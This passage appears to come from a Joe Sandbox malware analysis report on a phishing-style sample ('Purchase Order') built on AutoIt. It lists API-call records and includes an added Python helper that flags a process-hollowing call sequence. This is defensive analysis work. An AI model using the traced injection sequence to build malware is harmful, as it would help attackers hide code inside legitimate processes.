                      • GetSysColorBrush.USER32(0000000F), ref: 00A930B0
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00A930BF
                      • LoadIconW.USER32(00000063), ref: 00A930D5
                      • LoadIconW.USER32(000000A4), ref: 00A930E7
                      • LoadIconW.USER32(000000A2), ref: 00A930F9
                        • Part of subcall function 00A9318A: LoadImageW.USER32(00A90000,00000063,00000001,00000010,00000010,00000000), ref: 00A931AE
                      • RegisterClassExW.USER32(?), ref: 00A93167
                        • Part of subcall function 00A92F58: GetSysColorBrush.USER32(0000000F), ref: 00A92F8B
                        • Part of subcall function 00A92F58: RegisterClassExW.USER32(00000030), ref: 00A92FB5
                        • Part of subcall function 00A92F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A92FC6
                        • Part of subcall function 00A92F58: InitCommonControlsEx.COMCTL32(?), ref: 00A92FE3
                        • Part of subcall function 00A92F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A92FF3
                        • Part of subcall function 00A92F58: LoadIconW.USER32(000000A9), ref: 00A93009
                        • Part of subcall function 00A92F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A93018
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: 516ece55583e47f459e0e68857938d4435b66c5060f176717bd3f46249d66021
                      • Instruction ID: 729980cb3a9e1ae1ec82ffbfa08d5b2eab4796f4edb33b59b8f4141928f330d0
                      • Opcode Fuzzy Hash: 516ece55583e47f459e0e68857938d4435b66c5060f176717bd3f46249d66021
                      • Instruction Fuzzy Hash: 54215EB1E00304ABCB00DFA9EC49B9DBFF5EB48311F1489AAE204A32E0DB7449408F91

                      Control-flow Graph

                      APIs
                      • __lock.LIBCMT ref: 00ABBA74
                        • Part of subcall function 00AB8984: __mtinitlocknum.LIBCMT ref: 00AB8996
                        • Part of subcall function 00AB8984: EnterCriticalSection.KERNEL32(00AB0127,?,00AB876D,0000000D), ref: 00AB89AF
                      • __calloc_crt.LIBCMT ref: 00ABBA85
                        • Part of subcall function 00AB7616: __calloc_impl.LIBCMT ref: 00AB7625
                        • Part of subcall function 00AB7616: Sleep.KERNEL32(00000000,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB763C
                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00ABBAA0
                      • GetStartupInfoW.KERNEL32(?,00B46990,00000064,00AB6B14,00B467D8,00000014), ref: 00ABBAF9
                      • __calloc_crt.LIBCMT ref: 00ABBB44
                      • GetFileType.KERNEL32(00000001), ref: 00ABBB8B
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00ABBBC4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                      • String ID:
                      • API String ID: 1426640281-0
                      • Opcode ID: 04297c494b56306caf21bab2386542c1f251482002482b87c50d7b90d5c49f54
                      • Instruction ID: 70a69582ad58ebcdb363194ce2bef5f20e5846287a86c35b4746afa129c54898
                      • Opcode Fuzzy Hash: 04297c494b56306caf21bab2386542c1f251482002482b87c50d7b90d5c49f54
                      • Instruction Fuzzy Hash: CD81B4719157458FDB14CF68C8806EDBBF8BF4A324B64425DD4A6AB3D2CBB49802CB64

                      Control-flow Graph

                      APIs
                      • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013BC629
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013BC84F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0
                      • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                      • Instruction ID: 381944fe59bc4350be537724b93ee020d48e01487bc2b687fa3f136cacf54d04
                      • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                      • Instruction Fuzzy Hash: DBA11C74E00209EFDB24CFA4C895BEEBBB5BF48319F109159E611BB681E7759A40CF50

                      Control-flow Graph

                      APIs
                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00AAEADA,?,?), ref: 00AAEB27
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00AAEADA,?,?), ref: 00B04B26
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00AAEADA,?,?), ref: 00B04B65
                      • RegCloseKey.ADVAPI32(?,?,00AAEADA,?,?), ref: 00B04B94
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: QueryValue$CloseOpen
                      • String ID: Include$Software\AutoIt v3\AutoIt
                      • API String ID: 1586453840-614718249
                      • Opcode ID: 4357785fb88f77fa6669a39f3be1c9cb2a85b21f3a71be432a7683037609aea4
                      • Instruction ID: af74244660528c4d531611bb33ce0be9abfc001986deaeb1cd36fc422f034059
                      • Opcode Fuzzy Hash: 4357785fb88f77fa6669a39f3be1c9cb2a85b21f3a71be432a7683037609aea4
                      • Instruction Fuzzy Hash: 2A113D71601118BEEF05DBA4DD9AEFE77BCEB08354F504059B506E70A1EA709E01D760

                      Control-flow Graph

                      APIs
                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A92ECB
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A92EEC
                      • ShowWindow.USER32(00000000), ref: 00A92F00
                      • ShowWindow.USER32(00000000), ref: 00A92F09
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399
                      • Opcode ID: b5ecc6f07425ed8e0e42a94e4f85ec5d04eccea39220e9190d8e426dc8b72b09
                      • Instruction ID: 5ecc28c692c381f4bd654aa5ee1012fc29b68803d825031f8825a540bed6b18e
                      • Opcode Fuzzy Hash: b5ecc6f07425ed8e0e42a94e4f85ec5d04eccea39220e9190d8e426dc8b72b09
                      • Instruction Fuzzy Hash: B5F0D0715403D07AD731975B6C48F672E7ED7CBF11B05455EBA08931F0C9610895DAB0
                      APIs
                        • Part of subcall function 013BC238: Sleep.KERNEL32(000001F4), ref: 013BC249
                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013BC449
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: ZJVCFJ9J7WBMYD3X8
                      • API String ID: 2694422964-3489199035
                      • Opcode ID: 9a705e231a2286184239d8280caa9587be4b5c049c0f5329038b9cdf176bf9af
                      • Instruction ID: 9e2db9f31fd081993a90a54c2ba4f2023581beaaf16d1cef8fb06bc271267c35
                      • Opcode Fuzzy Hash: 9a705e231a2286184239d8280caa9587be4b5c049c0f5329038b9cdf176bf9af
                      • Instruction Fuzzy Hash: 95517371E04249DAEF21DBA4C854BEFBBB8AF15304F004199E709BB2C0E6B91B05CB65
                      APIs
                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B0454E
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • _memset.LIBCMT ref: 00A93965
                      • _wcscpy.LIBCMT ref: 00A939B5
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A939C6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                      • String ID: Line:
                      • API String ID: 3942752672-1585850449
                      • Opcode ID: 7dd655d19f8ac0824deb2e547c88804cc9fa4afbc43fb2ede98cd9c7dcb4e0e2
                      • Instruction ID: a82aaffc717de2f35d347eeb213f27116e4699a6e6c5106ca2984f934d41422e
                      • Opcode Fuzzy Hash: 7dd655d19f8ac0824deb2e547c88804cc9fa4afbc43fb2ede98cd9c7dcb4e0e2
                      • Instruction Fuzzy Hash: AC31C172608340ABDF21EB64DC51BDEB7F8AF54311F04495AF685931A1DF709A48CB92
                      APIs
                        • Part of subcall function 00A93F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A934E2,?,00000001), ref: 00A93FCD
                      • _free.LIBCMT ref: 00B03C27
                      • _free.LIBCMT ref: 00B03C6E
                        • Part of subcall function 00A9BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00B522E8,?,00000000,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?), ref: 00A9BE8B
                        • Part of subcall function 00A9BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?,00000002), ref: 00A9BEA7
                        • Part of subcall function 00A9BDF0: __wsplitpath.LIBCMT ref: 00A9BF19
                        • Part of subcall function 00A9BDF0: _wcscpy.LIBCMT ref: 00A9BF31
                        • Part of subcall function 00A9BDF0: _wcscat.LIBCMT ref: 00A9BF46
                        • Part of subcall function 00A9BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00A9BF56
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                      • API String ID: 1510338132-1757145024
                      • Opcode ID: a2bf36ed181de22d1e885128a7a6b9c92bbf47901e703f90e57ab45ea0381f57
                      • Instruction ID: cfc806eab940feaebf4d9612d7798cca6d19496747a398e12df7e08328639063
                      • Opcode Fuzzy Hash: a2bf36ed181de22d1e885128a7a6b9c92bbf47901e703f90e57ab45ea0381f57
                      • Instruction Fuzzy Hash: 1E917F71A10219AFCF04EFA4DD959EEBBF8FF19710F14446AF416AB291DB349A04CB50
                      APIs
                      • __getstream.LIBCMT ref: 00AB418E
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00AB41C9
                      • __wopenfile.LIBCMT ref: 00AB41D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                      • String ID: <G
                      • API String ID: 1820251861-2138716496
                      • Opcode ID: cb06f92078b760ab2855e06efca9dd1be83bea1344fdfef81aa41ff330dd331c
                      • Instruction ID: 88a9b229bd54ac49604c7f803ea5b6bd02b002a3400feebc9bb07f4a7202b550
                      • Opcode Fuzzy Hash: cb06f92078b760ab2855e06efca9dd1be83bea1344fdfef81aa41ff330dd331c
                      • Instruction Fuzzy Hash: 03110A70D002169FDB10BFBC9D426EF37FCAF58390B148625A815DB283EB74C981A761
                      APIs
                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AAC948,SwapMouseButtons,00000004,?), ref: 00AAC979
                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00AAC948,SwapMouseButtons,00000004,?,?,?,?,00AABF22), ref: 00AAC99A
                      • RegCloseKey.KERNEL32(00000000,?,?,00AAC948,SwapMouseButtons,00000004,?,?,?,?,00AABF22), ref: 00AAC9BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 3677997916-824357125
                      • Opcode ID: c9c551042e4bcb3ab9e00ca4d9be9fdbd48284780cbf8f1cd532a5dc077fab90
                      • Instruction ID: c38d93e10fd6692563cf4cb55a74a9c81aa4eb21c628d8f0411b76afe17ce69f
                      • Opcode Fuzzy Hash: c9c551042e4bcb3ab9e00ca4d9be9fdbd48284780cbf8f1cd532a5dc077fab90
                      • Instruction Fuzzy Hash: 52117C75511208FFEB128F64DC44EEF7BB8EF09750F00841AB841E7250D7319E409B60
                      APIs
                      • CreateProcessW.KERNEL32(?,00000000), ref: 013BB9F3
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013BBA89
                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 013BBAAB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                      • Instruction ID: f7c340523b6a257608215fbf081e3ff4365b47a84bc6ade4274b9553fc49a39a
                      • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                      • Instruction Fuzzy Hash: 77622030A14618DBEB24CFA4C850BDEB775EF58304F1091A9D20DEB794EB799E80CB59
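The record above is the one that matters for triage: CreateProcessW, Wow64GetThreadContext and ReadProcessMemory called in sequence from a region at 013B9000 that is not backed by a PE image, which is the preamble of a process-hollowing injector. The following is an added example (not part of the Joe Sandbox report or of the sample) that parses function records in the listing format used on this page and flags that pattern. It assumes, from the values visible on this page rather than from any documented format, that the dotted .sdmp file name carries the region base at position 3, the page protection at position 4 and the memory type at position 6, with values matching the Win32 PAGE_* and MEM_* constants; the sample records are copied from this page with their argument lists trimmed.

```python
"""Triage helper for Joe Sandbox function records (added example, not from the report)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

PAGE_EXECUTE_READWRITE = 0x40   # Win32 constant
MEM_IMAGE = 0x01000000          # Win32 constant
MEM_PRIVATE = 0x00020000        # Win32 constant
CONTEXT_FULL_X86 = 0x00010007   # CONTEXT_i386 | CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS

# Spawn, fetch the suspended thread's registers, read the target's memory:
# the call triad of the 013B9000 record on this page.
HOLLOWING_APIS = {"CreateProcessW", "Wow64GetThreadContext", "ReadProcessMemory"}

API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_@][\w@]*)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
)
SRC_RE = re.compile(
    r"Source File:\s*(?P<file>\S+\.sdmp),\s*Offset:\s*[0-9A-Fa-f]+,"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    direct: bool          # False when listed under "Part of subcall function"

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: Optional[str] = None
    based_on_pe: Optional[bool] = None

def parse_record(text: str) -> FunctionRecord:
    """Collect the API lines and the Memory Dump Source line of one function record."""
    rec = FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            rec.apis.append(ApiCall(m.group("name"), m.group("module"), args, m.group("sub") is None))
            continue
        m = SRC_RE.search(line)
        if m:
            rec.source_file = m.group("file")
            rec.based_on_pe = m.group("pe") == "true"
    return rec

def decode_dump_name(name: str) -> dict:
    """ASSUMPTION (inferred from this page, not a documented format): positional
    fields [3]=region base, [4]=page protection, [6]=memory type, all hex."""
    fields = name.rsplit(".sdmp", 1)[0].split(".")
    if len(fields) < 8:
        raise ValueError("unexpected dump name: %s" % name)
    return {"base": int(fields[3], 16), "protect": int(fields[4], 16), "mem_type": int(fields[6], 16)}

def _hex(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:          # "?", strings such as Control Panel\Mouse
        return None

def assess(rec: FunctionRecord) -> List[str]:
    """Return human-readable findings for one record; empty list means nothing notable."""
    findings = []
    direct = {c.name for c in rec.apis if c.direct}
    if HOLLOWING_APIS <= direct:
        findings.append("process-hollowing preamble: " + ", ".join(sorted(HOLLOWING_APIS)))
    for c in rec.apis:
        if c.name == "Wow64GetThreadContext" and c.args and _hex(c.args[-1]) == CONTEXT_FULL_X86:
            findings.append("Wow64GetThreadContext asks for CONTEXT_FULL (0x10007): full register set of the suspended thread")
        if c.name == "ReadProcessMemory" and len(c.args) >= 4 and _hex(c.args[3]) == 4:
            findings.append("ReadProcessMemory of 4 bytes: one 32-bit pointer, consistent with reading the remote PEB ImageBaseAddress")
    if rec.source_file:
        region = decode_dump_name(rec.source_file)
        if (rec.based_on_pe is False and region["mem_type"] == MEM_PRIVATE
                and region["protect"] & PAGE_EXECUTE_READWRITE):
            findings.append("RWX private region not backed by a PE image at 0x%X" % region["base"])
    return findings

# Constructed samples: the two records from this page, argument lists trimmed.
SAMPLE_INJECTED = r"""
APIs
• CreateProcessW.KERNEL32(?,00000000), ref: 013BB9F3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013BBA89
• ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 013BBAAB
Memory Dump Source
• Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
"""
SAMPLE_RUNTIME = r"""
APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003), ref: 00AAC979
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00AAC99A
• RegCloseKey.KERNEL32(00000000,?,?), ref: 00AAC9BC
Memory Dump Source
• Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
"""

if __name__ == "__main__":
    for label, text in (("013B9000 record", SAMPLE_INJECTED), ("00A91000 record", SAMPLE_RUNTIME)):
        print(label, assess(parse_record(text)) or ["nothing notable"])
```

The second sample, the SwapMouseButtons lookup from the PE-backed AutoIt runtime, produces no findings, which is the point of combining the call pattern with the region attributes: the CRT and AutoIt helper records that fill the rest of this listing are noise, while a CreateProcess/GetThreadContext/ReadProcessMemory triad executing from unbacked RWX memory is what to dump and analyse first.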
                      APIs
                        • Part of subcall function 00A941A7: _fseek.LIBCMT ref: 00A941BF
                        • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF49
                        • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF5C
                      • _free.LIBCMT ref: 00ADCDC9
                      • _free.LIBCMT ref: 00ADCDD0
                      • _free.LIBCMT ref: 00ADCE3B
                        • Part of subcall function 00AB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28DE
                        • Part of subcall function 00AB28CA: GetLastError.KERNEL32(00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28F0
                      • _free.LIBCMT ref: 00ADCE43
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                      • String ID:
                      • API String ID: 1552873950-0
                      • Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                      • Instruction ID: 74006ccdececbb7277ea31d4b5f23da708f6cb3c6deee2c81bce5df0e1969cbe
                      • Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                      • Instruction Fuzzy Hash: 15513EB1A04219AFDF159F64CC81BAEB7B9EF48310F1040AEF659A3251DB715A80CF59
                      APIs
                      • _memset.LIBCMT ref: 00B03CF1
                      • GetOpenFileNameW.COMDLG32(?,?,00000001,00B522E8), ref: 00B03D35
                        • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                        • Part of subcall function 00A93A67: SHGetMalloc.SHELL32(00A93C31), ref: 00A93A7D
                        • Part of subcall function 00A93A67: SHGetDesktopFolder.SHELL32(?), ref: 00A93A8F
                        • Part of subcall function 00A93A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00A93AD2
                        • Part of subcall function 00A93B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00B522E8,?), ref: 00A93B65
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                      • String ID: X
                      • API String ID: 3714316930-3081909835
                      • Opcode ID: 209dd0d9d971e74f1b9e11d440d8bc7eead192739a13eb0d8917a5537323233e
                      • Instruction ID: 693661f1d89a1a1c8781f46895d9f9dd7665cf435872023608b58773a167c498
                      • Opcode Fuzzy Hash: 209dd0d9d971e74f1b9e11d440d8bc7eead192739a13eb0d8917a5537323233e
                      • Instruction Fuzzy Hash: 6611CA72B00288ABCF05DFD8D8096DEBBFDAF45704F04800AE401BB281CBB55B498BA5
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?), ref: 00ADD01E
                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00ADD035
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
